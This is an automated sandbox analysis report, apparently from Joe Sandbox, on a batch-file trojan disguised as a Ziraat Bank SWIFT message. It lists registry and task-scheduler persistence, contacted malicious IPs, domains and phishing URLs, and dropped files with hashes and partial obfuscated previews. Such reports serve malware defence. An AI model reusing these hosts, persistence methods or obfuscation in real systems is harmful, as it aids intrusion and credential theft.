                                                                                      Detection:MAL
                                                                                      Classification:mal100.spre.troj.spyw.evad.winBAT@54/27@5/3
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 70%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 97%
                                                                                      • Number of executed functions: 244
                                                                                      • Number of non-executed functions: 34
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .bat
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Execution Graph export aborted for target TrojanAIbot.exe, PID 5352 because it is empty
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 3832 because it is empty
                                                                                      • Execution Graph export aborted for target server_BTC.exe, PID 3160 because it is empty
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat
                                                                                      TimeTypeDescription
                                                                                      12:02:25API Interceptor2x Sleep call for process: x.exe modified
                                                                                      12:02:37API Interceptor24x Sleep call for process: powershell.exe modified
                                                                                      12:02:38API Interceptor350724x Sleep call for process: TrojanAIbot.exe modified
                                                                                      12:02:39API Interceptor534544x Sleep call for process: neworigin.exe modified
                                                                                      12:02:43API Interceptor2x Sleep call for process: Wisrysxl.PIF modified
                                                                                      18:02:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
                                                                                      18:02:36Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                      18:02:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
                                                                                      18:02:52AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      104.26.12.205Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                                      • api.ipify.org/
                                                                                      Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                                      • api.ipify.org/
                                                                                      6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                      • api.ipify.org/
                                                                                      perfcc.elfGet hashmaliciousXmrigBrowse
                                                                                      • api.ipify.org/
                                                                                      SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                      • api.ipify.org/
                                                                                      SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                      • api.ipify.org/
                                                                                      hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • api.ipify.org/
                                                                                      198.252.105.91DHL-INVOICE-MBV.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      • www.legaldanaa.com/d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs
                                                                                      51.195.88.199New_Order_PO_GM5637H93.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLine, XWormBrowse
                                                                                        New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                          AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                            New_Order_568330_Material_Specifications.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWormBrowse
                                                                                              RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                  PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                    RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                      ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                        RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          s82.gocheapweb.comNew_Order_PO_GM5637H93.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLine, XWormBrowse
                                                                                                          • 51.195.88.199
                                                                                                          New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 51.195.88.199
                                                                                                          AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                          • 51.195.88.199
                                                                                                          New_Order_568330_Material_Specifications.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWormBrowse
                                                                                                          • 51.195.88.199
                                                                                                          RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                          • 51.195.88.199
                                                                                                          PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                          • 51.195.88.199
                                                                                                          PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                          • 51.195.88.199
                                                                                                          RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                          • 51.195.88.199
                                                                                                          ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 51.195.88.199
                                                                                                          RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                          • 51.195.88.199
                                                                                                          api.ipify.orgSwift Copy.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                          • 104.26.13.205
                                                                                                          Pago por adelantado_ USD 72000 (50%).exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                          • 172.67.74.152
                                                                                                          Creal.exeGet hashmaliciousCreal StealerBrowse
                                                                                                          • 104.26.13.205
                                                                                                          #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeGet hashmaliciousBlank Grabber, Creal StealerBrowse
                                                                                                          • 104.26.12.205
                                                                                                          ypauPrrA08.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                                                                                          • 104.26.13.205
                                                                                                          Sara.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 172.67.74.152
                                                                                                          Sara.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 104.26.12.205
                                                                                                          6G1YhrEmQu.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                          • 104.26.13.205
                                                                                                          gxe0.comNEOMS_EOI_FORM.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                          • 198.252.105.91
                                                                                                          NEOMS_EOI_FORM.GZGet hashmaliciousDBatLoaderBrowse
                                                                                                          • 198.252.105.91
                                                                                                          New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 198.252.105.91
                                                                                                          pywolwnvd.bizAENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                          • 54.244.188.177
                                                                                                          E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                          • 54.244.188.177
                                                                                                          Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 54.244.188.177
                                                                                                          AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 54.244.188.177
                                                                                                          SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 54.244.188.177
                                                                                                          AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 54.244.188.177
                                                                                                          RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                          • 54.244.188.177
                                                                                                          PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                          • 54.244.188.177
                                                                                                          PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                          • 54.244.188.177
                                                                                                          nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                                          • 54.244.188.177
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          CLOUDFLARENETUShttps://fnv.morsentutra.ru/DD8Q/Get hashmaliciousUnknownBrowse
                                                                                                          • 172.67.147.7
                                                                                                          7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fthedailyparanoia%2Ecom%2FGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 172.67.187.85
                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Swift Copy.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                          • 104.26.13.205
                                                                                                          https://fvggtrgtr57crthrvtrhrh.s3.us-east-2.amazonaws.com/u7yy78ty7t6fg67t676t/hg7g6g6gfvj5rfj/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                          • 104.17.25.14
                                                                                                          https://nwii.me/index-Usaa/Get hashmaliciousHTMLPhisherBrowse
                                                                                                          • 188.114.96.3
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Attachment-914011545-004.pdfGet hashmaliciousUnknownBrowse
                                                                                                          • 104.18.86.42
                                                                                                          https://klick.publikator.se/?BREV_ID=592&EPOST=kent.isaksson@platspecialisten.se&URL=https://link.mail.tailwindapp.com/c/443/65791c056ee100f6e0b1ce0da6ffd5aaa4304af6d9041064814b00b317faceeaGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 104.18.95.41
                                                                                                          HAWKHOSTCANEOMS_EOI_FORM.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                          • 198.252.105.91
                                                                                                          NEOMS_EOI_FORM.GZGet hashmaliciousDBatLoaderBrowse
                                                                                                          • 198.252.105.91
                                                                                                          New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 198.252.105.91
                                                                                                          Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                                          • 198.252.98.54
                                                                                                          SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 198.252.98.54
                                                                                                          PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 198.252.106.191
                                                                                                          https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_AGet hashmaliciousUnknownBrowse
                                                                                                          • 198.252.106.147
                                                                                                          Z6s208B9QX.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 198.252.106.191
                                                                                                          PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 198.252.106.191
                                                                                                          PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 198.252.106.191
                                                                                                          OVHFRhttps://klick.publikator.se/?BREV_ID=592&EPOST=kent.isaksson@platspecialisten.se&URL=https://link.mail.tailwindapp.com/c/443/65791c056ee100f6e0b1ce0da6ffd5aaa4304af6d9041064814b00b317faceeaGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 192.99.218.232
                                                                                                          RFQ_TFS-1508-AL NASR ENGINEERING.exeGet hashmaliciousRedLineBrowse
                                                                                                          • 193.70.111.186
                                                                                                          botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 37.187.76.119
                                                                                                          5r3fqt67ew531has4231.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                          • 178.32.95.230
                                                                                                          Cursor Commander.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 51.89.9.252
                                                                                                          6uqT7ARJKQ.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                          • 139.99.3.47
                                                                                                          WMdKM7E5Yg.exeGet hashmaliciousQuasarBrowse
                                                                                                          • 147.135.36.89
                                                                                                          https://bitcoinwisdom.com/these-workers-found-a-giant-snake-you-wont-believe-what-they-found-inside/2/?utm_source=taboola&utm_term=yahoo-aol-mail&utm_medium=cpc&utm_campaign=Snake+US.D_snake&cost=0.13&tblci=GiAmoZnDSKA9Rcvf4CX7BxL2zvlH6pqfvE-XRuuUPfhj0iCA4Woo2fPniM_m2u-_ATDYl18Get hashmaliciousLiteHTTP BotBrowse
                                                                                                          • 54.38.113.4
                                                                                                          FcRCSylOMs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • 5.39.10.93
                                                                                                          Y725GT96z1.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          • 94.23.162.163
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eSSA-Statement.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                          • 104.26.12.205
                                                                                                          Swift Copy.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                          • 104.26.12.205
                                                                                                          11315781264#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                          • 104.26.12.205
                                                                                                          Pago por adelantado_ USD 72000 (50%).exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.12.205
                                                                                                          Factura Honorarios 2024-11-04.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 104.26.12.205
                                                                                                          CERTIFICADO TITULARIDAD.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 104.26.12.205
                                                                                                          SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.12.205
                                                                                                          Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                          • 104.26.12.205
                                                                                                          https://t.ly/RpFMVGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 104.26.12.205
                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                          • 104.26.12.205
                                                                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                          • 198.252.105.91
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 198.252.105.91
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                          • 198.252.105.91
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 198.252.105.91
                                                                                                          file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                          • 198.252.105.91
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                          • 198.252.105.91
                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                          • 198.252.105.91
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 198.252.105.91
                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                          • 198.252.105.91
                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                          • 198.252.105.91
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          C:\Users\Public\Libraries\lxsyrsiW.pifNEOMS_EOI_FORM.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                            NEOMS_EOI_FORM.GZGet hashmaliciousDBatLoaderBrowse
                                                                                                              r876789878767.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                2tKeEoCCCw.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                  New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                    E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                      z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                        z1SWIFT_MT103_Payment_552016_cmd.batGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                          Order Specifications for Materials.docx.vbsGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                            Payment.cmdGet hashmaliciousAzorult, DBatLoaderBrowse
                                                                                                                              Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1290240
                                                                                                                              Entropy (8bit):5.277751032999737
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:mImGUcsvZZdubv7hfl3+Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlOsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                              MD5:052FDC7E9B1B11AC964325E136435F02
                                                                                                                              SHA1:3651B9D54DBB0393F5FA095C5BADB342CE55BB07
                                                                                                                              SHA-256:7B57FD9ED6D389B1B970402796F6773DD91FEA1EC74E69E534674DB5B21F73B8
                                                                                                                              SHA-512:2911FA7CCA634C9F0632E5FB7B3904186CD3E10E3CD507F63D0D540F9D384FAD18CF5C283ADA9AEFE370CFCC1A4F0A15FA847816EBA3F729FC1BC1ABBE727568
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................#......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4
                                                                                                                              Entropy (8bit):1.5
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Av:Av
                                                                                                                              MD5:0D25C4052914983B893AFA9B1C3141D2
                                                                                                                              SHA1:E75F05ECD4701EB25EFB7947FD5FCF8376FBFF9D
                                                                                                                              SHA-256:B3E58B2A0ADD30249EFE38CFE9955D765D8A0A882B239ED208F16E38DB62A00C
                                                                                                                              SHA-512:7ECE025E27544CA3EA68EBB8E437B500D434E5522BD0393994CDD081D9AC5CCF86DADACB955BE2C981D9102055ACADE5DD644ECD98C9E931F26572E4F237F8BA
                                                                                                                              Malicious:false
                                                                                                                              Preview:88..
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1921890
                                                                                                                              Entropy (8bit):7.398856770638502
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:uFLsbSRbR4KUHq/dhv95pz9P8/P/lUtAQXI53D7/vwpU19uyXABAtIFBlZ:ULhRGYHKOBlZ
                                                                                                                              MD5:34E82F30B12F324DB1D2604CFA91CBB2
                                                                                                                              SHA1:20001D49CD86B776EE8072A07F536B7330A77F97
                                                                                                                              SHA-256:F1821B6BA4856A51354BEED61C0F325D39901D70F9FF1792A63758FFEA32FCEF
                                                                                                                              SHA-512:47ADC8F19359C4DC9E073C7A464E3F5F0367AC6A06BB6AA741AA06FE8BD762ADB86304415623FB411E69CACC573E66E6397689C47B7291747E057E5BF001C1C1
                                                                                                                              Malicious:true
                                                                                                                              Preview:...Y#..K..&$..'.#'...%.... %" ...... ..&.....&..$"%.#$'#....'...... '%.%!... .%.''"". "#".%..&.&........%........."!...#'....Y#..K.. .& %.. ...Y#..K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j.........P.O..."..../....8....\..%.
                                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1056768
                                                                                                                              Entropy (8bit):6.917170198806807
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:/GBqWzMJ3rInJFhR1T6a3R6ZFlR+gKT44VoIOL7zk:/CHnca8YL6L
                                                                                                                              MD5:BDC3B662D1136F20F51F55A0F6A2FB9D
                                                                                                                              SHA1:EF8BAAD4F0F3F96E2D04F3C6CEA1471BCD651008
                                                                                                                              SHA-256:23B47A050614D71D7081F8E0313C972E9E6B1DF6C9EEC10F59B6EE06D0506EC9
                                                                                                                              SHA-512:29036CED934C7668B072C811285761A2B4CDD562B2D269E50BE767E8BE27589117E84BF0F34B0323912A3DEA4545DAB9B9E5A6046C8BEB36D15EF65056A88AD8
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................:......\.............@..............................................@...........................`...%... ..........................Tj...................................................f...............................text............................... ..`.itext.............................. ..`.data...H...........................@....bss.....6... ...........................idata...%...`...&..................@....tls....4............*...................rdata...............*..............@..@.reloc..Tj.......l...,..............@..B.rsrc........ ......................@..@..................... ..............@..@................................................................................................
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                              File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):62357
                                                                                                                              Entropy (8bit):4.705712327109906
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                              MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                              SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                              SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                                              SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                              Malicious:false
                                                                                                                              Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):68096
                                                                                                                              Entropy (8bit):6.328046551801531
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                                              MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                                              SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                                              SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                                              SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: NEOMS_EOI_FORM.cmd, Detection: malicious, Browse
                                                                                                                              • Filename: NEOMS_EOI_FORM.GZ, Detection: malicious, Browse
                                                                                                                              • Filename: r876789878767.cmd, Detection: malicious, Browse
                                                                                                                              • Filename: 2tKeEoCCCw.exe, Detection: malicious, Browse
                                                                                                                              • Filename: New_Order_PO_GM5637H93.cmd, Detection: malicious, Browse
                                                                                                                              • Filename: E_dekont.cmd, Detection: malicious, Browse
                                                                                                                              • Filename: z1Transaction_ID_REF2418_cmd.bat, Detection: malicious, Browse
                                                                                                                              • Filename: z1SWIFT_MT103_Payment_552016_cmd.bat, Detection: malicious, Browse
                                                                                                                              • Filename: Order Specifications for Materials.docx.vbs, Detection: malicious, Browse
                                                                                                                              • Filename: Payment.cmd, Detection: malicious, Browse
                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@
                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF">), ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):104
                                                                                                                              Entropy (8bit):5.094576921115185
                                                                                                                              Encrypted:false
